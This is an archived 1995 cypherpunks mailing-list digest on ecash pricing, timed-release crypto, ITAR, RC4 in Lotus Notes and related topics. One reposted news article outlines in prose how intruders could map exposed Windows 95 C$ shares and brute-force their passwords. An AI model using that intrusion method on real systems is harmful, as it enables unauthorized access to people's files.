Subject: Market Value of Web Pages
In-Reply-To:
Message-ID: <199511100143.AA22994@junkers.lochard.com.au>

>>BTW - I don't think we should be talking about a penny/page cost because it
>>is way too high for the current market. For example, my copy of Applied
>>Cryptography V2 cost about $.067/page AND came with the media to keep it
>>"forever". My (used) copy of Snow Crash cost closer to a penny/page and
>>also came with the media. I would think that somewhere between 1/100 to
>>1/10 of a penny/page is closer to the current market value of the page
>>content.

>I expect this to someday change, and to pay for some things at a fraction
>of a cent per hit, some other things for a few cents a hit, and maybe even
>some things at dollars per hit.

The maths of ecash and web pages gets very interesting very quickly. If you charge per page of a web server, $0.01 a page and you happen to be doing this on a million-hits-a-day web server then your machine is earning you $10,000 ecash bucks a day. How much is it to buy hardware and a link and set up a nice web site everyone wants to visit? If it was left running you'd collect $3,650,000 ecash bucks annually. That is just for browsing.
Sales on top of that via ecash (very low overheads relative to physical means) would mean very high profits. 1% of browsers spending US$50 is US$500,000 a day, or per year it is US$182,500,000. Not bad for an outlay of a couple of fast SPARCs and a quick net link and some staff to maintain it. If you toss arguments like this at some of the sites that would be viable for the hit numbers and then explain the only way that will occur is if the crypto laws are repealed, you will create a lot more lobbiers annoying their reps for the cause. ecash without good crypto is like the Federal Reserve delivering cash with open pickup trucks. Or doing credit card purchases on postcards.

Cheers,
Mark
mark at lochard.com.au

From hfinney at shell.portal.com Thu Nov 9 18:17:22 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 10 Nov 1995 10:17:22 +0800
Subject: ecash speed
In-Reply-To: <199511090130.UAA13562@jekyll.piermont.com>
Message-ID: <199511090508.VAA05884@jobe.shell.portal.com>

"Perry E. Metzger" writes:
>Hal writes:
>> The point is that if the anonymity afforded by ecash is too costly in
>> terms of time, then we may end up stuck with a non-anonymous system
>> simply because that is the only one efficient enough to work. It would
>> be good to find out if that is a serious problem.
>I suspect that as CPU speed exponentiates this will become less and
>less of a problem. It doesn't especially worry me.

Consider, though, what happens in the current ecash system if it were used to charge a penny per page. You would click on a link in your web browser to go to the new page. It would set the GET request to the remote server as usual. The server would fire up a CGI script which will run the shop software. That software will make a TCP stream connection back to your ecash wallet software which is running on the system where your client is. It sends a request to get paid $.01.
Assuming the wallet is configured to automatically approve such a payment, it will send a one penny coin to the shop software along the opened link. (This may also involve doing a PK encryption on the coin as an anti-theft measure; this aspect of the current ecash system is not documented AFAIK.) The shop software then opens a TCP stream connection to the bank, and forwards the coin there. The bank receives it, and checks the public key signature in the coin. It then compares the coin against every other coin which has ever been spent (within the validity period of the coin) to make sure it is not being doubly spent. If this all checks out it sends back some authentication message to the original server. The shop software then delivers the new page to the client browser.

This all has to happen whenever you click on a link in your browser. Even with fast CPU's I think the extra step of connecting to the bank, having it check against all coins, and getting approval will be considerable for each link traversal.

Hal

From frantz at netcom.com Thu Nov 9 18:25:29 1995
From: frantz at netcom.com (Bill Frantz)
Date: Fri, 10 Nov 1995 10:25:29 +0800
Subject: Market Value of Web Pages
Message-ID: <199511100140.RAA09572@netcom11.netcom.com>

At 13:28 11/9/95 -0800, Timothy C. May wrote:
>With all due respect to Bill--his mention of agorics tells me he knows
>something about computational ecologies and markets--, there is no
>reasonable way to say what price is "closer to the current market value of
>the page content," except by what the market will bear!

Tim is absolutely correct that the market determines the current market value. I mentioned some low value items in the current market and he mentioned some high value ones. However, there is not really a problem in paying for high valued web pages (like the $400/photo consultant report he mentions). The various network payment schemes that have been proposed and implemented will handle these quite adequately.
What concerns me is building systems that can support low-cost high-volume markets. If I have to pay a penny/page, I am going to ask whether Netscape can use a whole gigabyte disk for its cache and have basically a pay/copy system. If the cost is low enough, I will pay/view and avoid stale data in the cache problems. However, there are very few systems where the transaction costs are low enough to support low-cost high-volume markets.

Bill

-----------------------------------------------------------------
Bill Frantz        Periwinkle -- Computer Consulting
(408)356-8506      16345 Englewood Ave.
frantz at netcom.com  Los Gatos, CA 95032, USA

From karn at qualcomm.com Thu Nov 9 18:36:08 1995
From: karn at qualcomm.com (Phil Karn)
Date: Fri, 10 Nov 1995 10:36:08 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511090913.BAA08368@ix.ix.netcom.com>
Message-ID: <199511100142.RAA13467@servo.qualcomm.com>

>If speed is really a concern, you could do a 640 or 768 bit modulus

Hilarie suggested exactly this in private mail, and I've agreed. I'm going to generate a 768-bit optional modulus.

Bill has also suggested a killer 4096-bit modulus for the truly paranoid. Not sure my poor 32MB P90 can handle that without thrashing its guts out, but I'll give it a try.

Phil

From liberty at gate.net Thu Nov 9 19:06:59 1995
From: liberty at gate.net (Jim Ray)
Date: Fri, 10 Nov 1995 11:06:59 +0800
Subject: Meteors [NOISE]
Message-ID: <199511100156.UAA35213@tequesta.gate.net>

My car window was taken out 5 years ago in Saint Petersburg, FL by a golf-ball sized meteorite during the Pleiades Meteor Shower. I still have the rock, and the glass cost me $100 (the insurance deductible). Happily, I wasn't in my car at the time, but I no longer think of meteor damage as a rare event. I've come to believe that Republicans could be right, for the wrong reason, about SDI. As a Libertarian, I find the problem of planetary meteor defense/avoidance troubling.
JMR

Regards, Jim Ray

"When I visit Congress, I feel like Tom Paine in the Court of King George." John Perry Barlow

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35 (key on page & servers) IANAL
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________

From cme at clark.net Thu Nov 9 20:00:23 1995
From: cme at clark.net (cme at clark.net)
Date: Fri, 10 Nov 1995 12:00:23 +0800
Subject: Cryptographic Random Numbers
Message-ID: <199511100310.WAA06420@clark.net>

I'm working on an appendix to the P1363 Public Key Standard draft covering sources for and handling of cryptographic random numbers. I've got a draft on which I'd appreciate comments. It's available as a web page:

http://www.clark.net/pub/cme/CRN.html

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
| ``Officer, officer, arrest that man! He's whistling a dirty song.'' |
+---------------------------------------------- Jean Ellison (aka Mother) -+

From beavis at bioanalytical.com Thu Nov 9 20:40:50 1995
From: beavis at bioanalytical.com (Beavis B.
Thoopit)
Date: Fri, 10 Nov 1995 12:40:50 +0800
Subject: Timed-release crypto and information economics
In-Reply-To:
Message-ID: <199511100331.WAA02410@bioanalytical.com>

Tim May responded:
> The tamper-proof (more correctly, "tamper-resistant" or
> "tamper-responding") hardware is so that attackers do not alter the clocks,
> as one example, to "speed up" the time release. Or grab the key, as another
> example.
>
> (Cranking up the clock speed may or may not be possible and still have the
> device work, but it's still an attack to consider.)
>
> If the attacker can grab the internal state of the device, he can of course
> run the "transform" talked about above on his equipment.
>
> >If the transform exists, it will ease/eliminate the reliance on the
> >"economics" of cryptography to build a tamper-proof physical device.
>
> You'll need to more carefully argue your thesis. I cannot imagine a method,
> save perhaps for quantum computing techniques, which can avoid the need for
> "secure secrets," either via a person keeping a secret or a box keeping a
> secret.

Above, I said "ease/eliminate"... let me limit my claim to "ease".

I see 2 unique points in this scheme that I have not seen discussed much:

1) Using _dynamics_ to _limit_ (maybe not prevent) penetration of a system.
2) Using a feedback state machine in a heavily iterative manner to hide the message.

The tamper-resistant circuits discussed (and some enjoying some hopefully profitable sales) have been _static_. There is no (of which I am aware) continual change in the circuit/mechanism. I propose a device in some form of incessant motion (electrical or otherwise). It seems a greater (though I am sure not impossible) task to capture the state of a moving target.

It seems that there may be a device that inherently allows itself to be read serially (one bit after another). Add the feedback state machine to this (ephemeral) device, and you may have a nice platform for time-released information.
The torsion-wire device described in a previous post is a nice example of a device that allows access to only one bit at a time. (Now, maybe some sort of camera could be used to "see" all of the bits at once in flight along the wire. For argument, let's assume not.) The problem with the torsion wire device is that the math transform needs to live somewhere between the two ends; access to the bits at the front and back of the transform is not allowed.

I want something cheaper than a satellite, but beaming bits to a satellite that performs the iterative, feedback transform and transmits the transformed bits back home may illustrate the type of platform needed. It allows me to see only one bit at a time. The bits are munched each "round". A delay is inherent in the system and is not "acceleratable".

If this platform exists, how do I precompute a message to take advantage of it?

From adam at lighthouse.homeport.org Thu Nov 9 23:41:48 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Fri, 10 Nov 1995 15:41:48 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <199511080135.UAA05624@homeport.org>

Dan Weinstein wrote:
| What U.S. law says and what U.S. officials can enforce are two
| different things. You are in violation of ITAR if you send crypto
| software from Mexico to Europe over the INTERNET if it is routed
| through the U.S. Think of it like drugs being shipped through the
| U.S., the drug lord that sent it through is just as guilty under U.S.

It's worth noting that IP is a packet routing system. It does not use paths or virtual circuits, like ATM or X.25. This means that it is not always possible to predict what route packets will follow. This is especially true of non-interactive protocols like SMTP.
I can traceroute to get a good idea of where my ftp packets are going right now, but between the time I do the traceroute, send a mail message, and it actually gets transmitted, a router somewhere along my old path might have died, and my packets, unbeknownst to me, are taking a new path.

Thus, if the user in Italy has no reason to expect that their mail to Germany will traverse the US, then I suspect that the US would have a hard time proving any criminal act. Doesn't a criminal act require intent of some type? If IP routing, in conjunction with SMTP, beyond the control of the users, ships packets through the US, I have a hard time believing that that makes those users criminals.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From stewarts at ix.netcom.com Thu Nov 9 23:56:19 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 10 Nov 1995 15:56:19 +0800
Subject: Timed-release crypto and information economics
Message-ID: <199511100540.VAA26681@ix6.ix.netcom.com>

At 10:58 AM 11/9/95 -0500, "Beavis B. Thoopit" wrote:
>I have not yet convinced myself that a time-release information device
>is impossible....

Actually, if you don't mind only getting 3 seconds into the future, moon-bounce is fairly simple and hard to tap on the uplink. Unfortunately, most objects sufficiently far away to use this sort of technique for practical applications are too small or distant to be good bounce targets, and some, like the Sun, are just not real cooperative.

For more expensive techniques, you could always launch a spaceship into a cometary orbit, figuring out how long it'll take to come back.
#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From mark at lochard.com.au Fri Nov 10 01:06:09 1995
From: mark at lochard.com.au (Mark)
Date: Fri, 10 Nov 1995 17:06:09 +0800
Subject: NOISE: Bill Gates view of SW Bugs and new releases - some quotes
Message-ID: <199511100853.AA35016@junkers.lochard.com.au>

Here is some signature fodder.

>FOCUS - is a German magazine
>
>
>FOCUS: Every new release of a software which has less bugs than the older
>       one is also more complex and has more features...
>Gates: No, only if that is what'll sell!
>
>FOCUS: But...
>Gates: Only if that is what'll sell! We've never done a piece of software
>       unless we thought it would sell. That's why everything we do in
>       software ... it's really amazing: We do it because we think that's
>       what customers want. That's why we do what we do.
>
>FOCUS: But on the other hand - you would say: Okay, folks, if you don't
>       like these new features, stay with the old version, and keep the bugs?
>Gates: No! We have lots and lots of competitors. The new version - it's not
>       there to fix bugs. That's not the reason we come up with a new version.
>
>FOCUS: But there are bugs in any version which people would really like to
>       have fixed.
>Gates: No! There are no significant bugs in our released software that any
>       significant number of users want fixed.
>
>FOCUS: Oh, my God. I always get mad at my computer if MS Word swallows the
>       page numbers of a document which I printed a couple of times with page
>       numbers. If I complain to anybody they say "Well, upgrade from
>       version 5.11 to 6.0".
>Gates: No! If you really think there's a bug you should report a bug. Maybe
>       that you're not using it properly. Have you ever considered that?
>
>FOCUS: Yeah, I did...
>Gates: It turns out Luddites don't know how to use software properly, so
>       you should look into that.
- The reason we come up with new versions
>       is not to fix bugs. It's absolutely not. It's the stupidest reason to
>       buy a new version I ever heard. When we do a new version we put in lots
>       of new things that people are asking for. And so, in no sense, is
>       stability a reason to move to a new version. It's never a reason.
>
>FOCUS: How come I keep being told by computer vendors "Well, we know about
>       this bug, wait till the next version is there, it'll be fixed"? I hear
>       this all the time. How come? If you're telling me there are no
>       significant bugs in software and there is no reason to do a new version?
>Gates: No. I'm saying: We don't do a new version to fix bugs. We don't. Not
>       enough people would buy it. You can take a hundred people using Microsoft
>       Word. Call them up and say "Would you buy a new version because of bugs?"
>       You won't get a single person to say they'd buy a new version because of
>       bugs. We'd never be able to sell a release on that basis.
>
>FOCUS: Probably you have other contacts to your software developers. But if
>       Mister Anybody, like me, calls up a store or a support line and says,
>       "Hey listen, there's a bug" ... 90 percent of the time I get the answer
>       "Oh, well, yeah, that's not too bad, wait to the next version and it'll
>       be fixed". That's how the system works.
>
>Gates: Guess how much we spend on phone calls every year.
>FOCUS: Hm, a couple of million dollars?
>
>Gates: 500 million dollars a year. We take every one of these phone calls
>       and classify them. That's the input we use to do the next version.
>       So it's like the world's biggest feedback loop. People call in - we
>       decide what to do on it. Do you want to know what percentage of those
>       phonecalls relates to bugs in the software? Less than one percent.
>
>FOCUS: So people call in to say "Hey listen, I would love to have this and
>       that feature"?
>Gates: Actually, that's about five percent. Most of them call to get advice
>       on how to do a certain thing with the software.
That's the primary thing.
>       We could have you sit and listen to these phone calls. There are millions
>       and millions of them. It really isn't statistically significant. Sit in
>       and listen to Win 95 calls, sit in and listen to Word calls, and wait,
>       just wait for weeks and weeks for someone to call in and say "Oh, I
>       found a bug in this thing".
>...
>
>FOCUS: So where does this common feeling of frustration come from that
>       unites all the PC users? Everybody experiences it every day that these
>       things simply don't work like they should.
>Gates: Because it's cool. It's like, "Yeah, been there done that - oh,
>       yeah, I know that bug." - I can understand that phenomenon
>       sociologically, not technically.

From jcobb at ahcbsd1.ovnet.com Fri Nov 10 01:51:46 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Fri, 10 Nov 1995 17:51:46 +0800
Subject: Above The "Minimum"
Message-ID:

Friend,

The following excerpt is reposted by permission of editor at cdt.org (cdt = Center for Democracy and Technology).

CDT POLICY POST Number 28 November 6, 1995

CONTENTS:
(1) Senator Leahy Calls on FBI to Justify Surveillance Capacity Request
(2) Text of Senator Leahy's Letter to FBI Director Freeh
(3) Review of Digital Telephony Implementation to Date
(4) How To Subscribe To The CDT Policy Post Distribution List
(5) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its entirety. Excerpts may be re-posted by permission (editor at cdt.org)

[snip]

(3) REVIEW OF DIGITAL TELEPHONY PROCESS TO DATE

[snip]

* DIRECT NEGOTIATIONS WITH TELECOMMUNICATIONS CARRIERS FOR SURVEILLANCE CAPACITY ABOVE THE NATIONAL MINIMUM?

The FBI has proposed to undertake direct negotiations with telecommunications carriers for surveillance capacity beyond the proposed national minimum standard requested in the notice.
When Congress passed CALEA last year, it created a public process to bring law enforcement's electronic surveillance ability under public scrutiny in order to balance the new authority to influence the design of telecommunications networks. The public accountability provisions of CALEA require the FBI to publish *all* surveillance capacity requests. Congress must take a critical look at this aspect of the FBI's proposal, and should not appropriate funds until the FBI agrees to disclose all capacity requests, as required by the law.

[snip]

To subscribe to the policy post distribution list, send mail to "Majordomo at cdt.org" with:

subscribe policy-posts

in the body of the message (leave the subject line blank)

----

Cordially,

Jim

From cpunk at remail.ecafe.org Fri Nov 10 02:18:48 1995
From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer)
Date: Fri, 10 Nov 1995 18:18:48 +0800
Subject: Win95 A Hacker's Net Dream
Message-ID: <199511101057.KAA01104@pangaea.ang.ecafe.org>

Windows 95 Is A Hacker's Dream Over The Internet

Central, Hong Kong, Nov 9 (NB) -- Windows 95, combined with the Internet, could be a dream made in hacker heaven. From seasoned propeller heads Newsbytes has contacted, it looks like Windows 95 could be more of a security nightmare than was first thought. This is especially true where fixed link companies are concerned.

An investigation of the new operating system, when hooked onto the Internet, leaves computers wide open. Executing a series of simple, uncomplicated commands opens up company and private users' computers to hacking the moment they access the Internet, claim some analysts. Worse, they may never know it has been done.

Using a simple Unix command, a hacker can locate the IP (Internet protocol) address of the subscriber logged into an Internet service provider. Then he needs only one more thing; a logged-on Internet user using Microsoft's new operating system.
For businesses with leased line Internet links, it can happen at any time, day or night.

Once the IP address has been noted, the hacker simply creates a file through DOS on his own system, specifying the address and naming it. Using two other commands -- which purge the remote names on the IP, or Internet provider's port -- the system then refreshes and remaps itself in preparation to be accessed by the hacker's computer.

Because Windows 95 is designed with a networking capability, it leaves all computers in the office open to illegal access. Once the hacker has called up his Map Network Drive, the hard disk on his own machine cannot be differentiated from that of the genuine user.

All that need be done then is to put in a common drive name, most obviously "C:\." For networked machines, the default "C$" is common. This gives access to all files on the subscriber's drive.

While Windows 95 allows the user to protect the drive by giving it a password, computer experts Newsbytes talked to said that device won't necessarily lock out intruders. Because the operating system has no "audit" trail -- in other words, it does not log who or how someone is accessing the drive -- a hacker can spend weeks trying to discover the password. Password search programs, like Cracker, are readily available and can break through most simple password sequences.

-----

From weidai at eskimo.com Fri Nov 10 19:01:29 1995
From: weidai at eskimo.com (Wei Dai)
Date: Fri, 10 Nov 95 19:01:29 PST
Subject: Diffie-Hellman in GF(2^n)?
Message-ID:

Most Diffie-Hellman implementations currently use the multiplicative group of prime fields. However, the multiplicative group of finite fields of characteristic 2 (GF(2^n)) can also be used and should be easier to implement. Is there any reason why they should not be used? Does anyone know the asymptotic running time of the best algorithm for calculating discrete logarithms in GF(2^n)?
Wei Dai

From j.d.stumbles at reading.ac.uk Fri Nov 10 05:47:02 1995
From: j.d.stumbles at reading.ac.uk (John Stumbles)
Date: Fri, 10 Nov 1995 21:47:02 +0800
Subject: INFO BLACKOUT _fwd_
Message-ID: <"mail2.readin:061930:951110131700"@reading.ac.uk>

I saw this on the NZ.general newsgroup and had to share it with the list. 'fraid it's just the reply - the original must've expired by the time I got there (and I couldn't be bothered to go looking for an archive to track it down in).

Enjoy...

>ab330 at torfree.net (Bob Allisat) wrote:
>
>
>>Powerful national security insiders have established effective control
>>over the entrance gateways to the Internet. Disturbing signs are now
>>emerging that the "information superhighway" has been targeted for
>>systematic surveillance and political dossier-building on Americans'
>>opinions.
>
> Oh, really?
>
>>SAIC is a $2 billion defense and FBI contractor with a board of
>>directors that reads like a Who's Who of the intelligence community.
>>Board members include Admiral Bobby Ray Inman, the former director of
>>the National Security Agency (NSA) and deputy director of the CIA; Melvin
>>Laird, defense secretary under Richard Nixon; Donald Hicks, former head
>>of research and development for the Pentagon; Donald Kerr, former head
>>of the Los Alamos National Laboratory; and General Maxwell Thurman
>>(ret.), the commander of the U.S. invasion of Panama.
>
>>The corporation also has a legion of computer network specialists and
>>an entire division of computer consultants.
>
> As does IBM, DEC, AT&T, MicroSoft, shall I go on?
>
>>SAIC currently holds contracts
>>for re-engineering the Pentagon's information systems, automating the
>>FBI's computerized fingerprint identification system, and building a
>>national criminal history and information system.
>
> Nope, I believe that's DISA's job now (was DCA)
>
>>The Internet is a marvel of computer software technology.
It was designed
>>to survive a nuclear attack on the United States--like the Post Office,
>>it's literally smart enough to find a way to get the mail through even if
>>most of the network is missing.
>
> Wow, TCP/IP is a marvel? this guy must hate Novell.
>
>>But control of the Internet domain name registration means the ability
>>to remove troublesome--or outspoken--computer systems from the network.
>>Potentially, this control also confers the power to insinuate "phantom"
>>domains into the network--for surveillance purposes, for example,--or
>>for real-time, automatic censorship.
> So the government can wipe out all nameservers at once? This is
>getting better....
>
>>Furthermore, anecdotal evidence gathered by this author (Matthews)
>>suggests that actual "truth control" is taking place on the net now.
>>E-mail messages with controversial contents--including details of the
>>SAIC takeover of domain names--have consistently disappeared as they
>>travel across the network. News items concerning the Vincent Foster
>>"suicide" investigation and allegations of NSA bank spying through
>>compromised Inslaw software are being quickly and automatically
>>cancelled. And the cancellations are not by their authors.
>
> Must be a bad MX server somewhere.
>
>>With domain names under the control of secret government insiders, it
>>is even theoretically possible that large parts of the Internet could
>>be shut down and silenced at critical times. This could be accomplished
>>by suddenly altering domain name registration or interposing compromised
>>"domains" at critical points. These compromised systems could serve as
>>"black holes" at critical times, stopping e-mail and important news
>>from reaching the world -- or the rest of the country.
>
> Well that means we'll just have to use IP addresses, right?
>
>>Exercises in "turning the Internet off" have already taken place in
>>Taiwan and Hong Kong. In Taiwan the 'net was successfully shut down.
>>All network traffic--including news, opinions, and e-mail sent by computer
>>users was successfully "bottled up" on the island and prevented from
>>reaching the world.
>
> It sure is easy to cut an island off, but a continent or more?
>
>>In Hong Kong the Internet wasn't quite strangled, but the British
>>authorities who control that colony managed to throttle free electronic speech
>>with the rest of the world until everything was bottlenecked into a few
>>little-known satellite links.
>
>>These are alarming precedents and sure signs that powerful, shadowy
>>forces are preparing to chop at the very roots of America's new Liberty
>>Tree. The secretive people on the board of directors of SAIC are
>>intelligence professionals skilled at manufacturing events--and then
>>manufacturing public opinion and consent by controlling the truth. Will
>>Internet disinformation, censorship or "shutdowns" signal the next American
>>crisis?
>
> So, you basically said that the government is willing to cripple
>itself by shutting down the Internet and MILNET. This guy needs a
>kick in the teeth or something to wake him up. Next thing you know is
>that he'll claim to be abducted by CIA agents posing as Elvis
>impersonators. And he'll start believing Elvis still lives.
>
> -Dale
>

John Stumbles j.d.stumbles at reading.ac.uk
Computer Services, University of Reading http://www.rdg.ac.uk/~suqstmbl
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

From cme at TIS.COM Fri Nov 10 07:21:59 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 10 Nov 1995 23:21:59 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <199511092232.OAA08016@comsec.com>
Message-ID: <9511101445.AA26394@tis.com>

>From: "Beavis B. Thoopit"
>Date: Thu, 9 Nov 1995 10:58:03 -0500 (EST)

>I have not yet convinced myself that a time-release information device
>is impossible....
>
>Does there exist a storage device that, due to _dynamics_ (or other
>factor), prevents the total contents being read in one instance?
>
>Bubble memory device? Torsion wire memory device?

The only one I've been able to think of (from this thread on sci.crypt several years ago) was a message, e.g., PGP encrypted with two different public keys K1 and K2:

E(K1, E(K2, E(K1, E(K2, ..., E(K1, X)...))))

with private key 1 here on Earth and private key 2 a reasonable distance away -- e.g., Mars.

The time it takes to decrypt this *can* be lower-bounded, assuming the private keys remain secret.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme |
|Trusted Information Systems, Inc. http://www.tis.com/ |
|3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 |
+--------------------------------------------------------------------------+

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Fri Nov 10 08:47:04 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Sat, 11 Nov 1995 00:47:04 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID:

I did say that I would discuss the apparent disagreement between Mr. Froomkin and myself on the issue of the separation of powers and the validity of the ITAR. But, since I think that we were rather at cross-purposes and not in any real disagreement--and since the subject is a fair distance from the core concerns of this list--I will keep this response short.

The first place where Mr.
Froomkin and I got at cross-purposes was when I said:

   I would admit that a court might do this in an effort to hold the statute constitutional, but a court might also hold the regulations unconstitutional because they are overbroad.

And Mr. Froomkin replied:

   Technically, this is holding the regulations ultra vires, not unconstitutional; the difference matters.

which, at first, rather confused me, until I realized that in my haste I had been assuming--since I automatically think of constitutional challenges to the ITAR in terms of the first amendment--that the ``unconstitutionality'' in question was that of violating the first amendment and was applying the first amendment doctrine of ``overbreadth'' to a constitutional challenge that might have been based on some other ground, like ``lack of jurisdiction'', and yet Mr. Froomkin's response seemed to relate to my separation of powers argument, which can, of course, quite properly be called an ``ultra vires'' argument.

I think that it was my failure to keep the different strands of my various arguments separate that is responsible for our apparent disagreement here, and for that I apologize.

But I do think that Mr. Froomkin is wrong in claiming that holding the regulations ultra vires is not the same as holding them unconstitutional. (I agree, however, that if one were to challenge the regulations in a proceeding in the nature of quo warranto brought under the Administrative Procedure Act, one would probably not talk about the regulations being ``unconstitutional''; on the other hand, I also have my doubts about whether one would use the phrase ``ultra vires'' in such a proceeding.) When a defendant in a criminal case raises the defense that the regulations he is charged with violating are ``ultra vires'' because Congress did not authorize them, that most certainly is a constitutional issue, involving the supremacy clause, the due process clause, the ninth-amendment, and the doctrine of separation of powers.
But perhaps I still misunderstand what argument of mine--or that I appeared to make--was the one to which Mr. Froomkin attached the ``ultra vires'' label. In any case, I want to thank him for doing so, because it brought home to me the important fact that it is possible that the ITAR provisions relating to cryptographic software could be struck down, not because they violate the first amendment, or would violate it if passed by congress, and not because the court is trying to dodge the difficult first amendment issue, but simply because the provisions are not authorized by any legislation.

In any case, my separation of powers argument appears in Junger, Down Memory Lane: The Case of the Pentagon Papers, 23 CWRU L. Rev. 3 (1971). After counting noses in the Pentagon Papers case I concluded that the only position that arguably was agreed to by a majority of the justices in the case was that the injunction that the government sought was not authorized by Congress, and that therefore the government was not entitled to the relief that it sought. And I suggested that this meant that the court never determined whether Congress could have passed a valid law authorizing the ``prior restraint'' in such a case. And finally I suggested that that was not a bad way of avoiding a difficult constitutional question under the first amendment. (Or at least that is a thumb-nail sketch of how I read the article now.)

With this explanation, I don't know whether Mr. Froomkin would persist in his statement that:

   It's too far off topic to pursue any further, but I must take exception to the suggestion that we are well served by separation of powers intruding into other legal domains. Bowsher tells us that causation principles go out the window in SOP cases. That alone makes it radioactive.

I must admit that I don't know what it is that he is referring to.

--
Peter D.
Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From Charlie_Kaufman/Iris.IRIS at iris.com Fri Nov 10 08:59:09 1995 From: Charlie_Kaufman/Iris.IRIS at iris.com (Charlie Kaufman/Iris) Date: Sat, 11 Nov 1995 00:59:09 +0800 Subject: Lotus Notes RSA Implementation Question Message-ID: <9511102035.AA6927@moe.iris.com> >If anyone on the list has knowledge of the following items, I would be >very gratefull. > >1) What is the key size used by the USA licensed version? > Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for encryption in the exportable version and bigger keys for signatures in all versions and for encryption in the USA version. I'm not sure I'm allowed to say what the key size will be ahead of the product shipping. >2) Considering RC4 is a proprietary scheme, have there been any >concerted efforts to validate it's strength or lack of? If so, could >you give a pointer to any documents I could review. > There has been considerable discussion of the security of RC4 on this list, and some subtle (i.e. worrisome but not disasterous) weaknesses have been found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed to date because it does not encrypt recognizable plaintext with the first few bytes of the RC4 stream. >...Bob Glassley > --Charlie Kaufman (charlie_kaufman at iris.com) From tjunker at phoenix.phoenix.net Sat Nov 11 01:04:46 1995 From: tjunker at phoenix.phoenix.net (Thomas Junker) Date: Sat, 11 Nov 95 01:04:46 PST Subject: the revolution of microcurrency Message-ID: <199511110904.DAA12059@phoenix.net> On 9 Nov 95 at 15:47, Vladimir Z. Nuri wrote: > Subject: the revolution of microcurrency > the topic of "microcurrency" has come up on this list > ... > touting it as a revolutionary change in the economy. I > ... > agree with this wholeheartedly. 
the possibility that
> people can
> ...
> will all contribute to a REVOLUTIONARY effect on culture.
> my key idea on all of this is that the whole idea of
> copyright is going to melt when you introduce cash, not
> be strengthened.

I don't think so.

> there are a lot of people out there who
> think that one has to try to put a lock and chain on web
> pages or whatever that one is "selling", and the
> horrible problem of the net is that anything can be
> copied. and these people are feverishly working on
> specious "solutions" to this "problem" right now.

What's happening is that while some people try to impose book and magazine notions onto the Web, others gleefully splatter the landscape with everything from the interesting to the awful but are generally stopped short of making a living at it by the absence of workable means of asking for and receiving nominal sums. Meanwhile, some other people are realizing that today's $30/yr newsletter of 20,000 circulation will become tomorrow's 25-cent-per-copy newsletter of 2 or 3 hundred thousand "circulation," making more total money and reaching and influencing far more people. A much larger volume of information will be worth a penny or less for a peek. When those transactions become close to transparent and of unnoticeable latency, *then* we will see the explosion that will put present Web growth into perspective as the baby crawl that it is.

This doesn't amount to putting locks and chains on Web pages any more than newsstands put locks and chains on newspapers or magazines. When it's cheap enough and the transaction is a no-brainer, the buyer gets easy access while the publisher has reason to be there publishing, and neither worries too much about the value of the single copy.

> says, "you have to protect what you are selling from
> other people or you won't make any money".
this theme

No, the point is that you have to have a way of making something or you won't have any incentive to generate the information or make it available to others. The news for today is that the way of making something on small amounts of low-value information is almost at hand.

> I submit that things like the release of public domain
> standards and products like Java and Netscape for free
> are not merely blips at this moment but increasingly are
> going to be the marketing plan of the future. the idea is
> that you give away your product for FREE,

Standards are not the product. Standards are what help make a market possible for products that must interface with other products. The closed-system people may have seen this in the momentary light of their extinction.

> and then people pay you if they like it.

Don't hold your breath.

> this new ideology will be relevant to products that are
> not "things" but in fact are more in the realm of
> intellectual property, i.e. writing, software,
> cyberspace web pages, etc.

Intellectual property is not new. What's new are distribution and fee collection systems with the potential for incremental costs approaching zero. Most of the infrastructure for that is in place, in fact has been in place for quite a few years. What has been missing has been the critical mass of users actually participating, and near-zero cost payment mechanisms. I'm spectacularly disappointed by the initial ecash and payment offerings, since they seem to miss the whole point and be aimed at web-transacted business no different than the high-overhead transactions that take place face-to-face in retail stores and by phone and mail.

> the beauty of this system is that NO LONGER is
> "unauthorized" distribution" the "enemy". it is your
> FRIEND, a key aspect of profit!!
Freely-distributable shareware has been around for 10-15 years, and has grown from being the computer field's butt for bad jokes to a maturing distribution methodology that supports an increasing number of author/publishers offering some quite substantial and solid products. It did this, by the way, without substantial benefit or contribution from the Internet or the Web.

> product to "authorized users". (i.e. those who pay in
> advance). our entire society thinks within this paradigm,

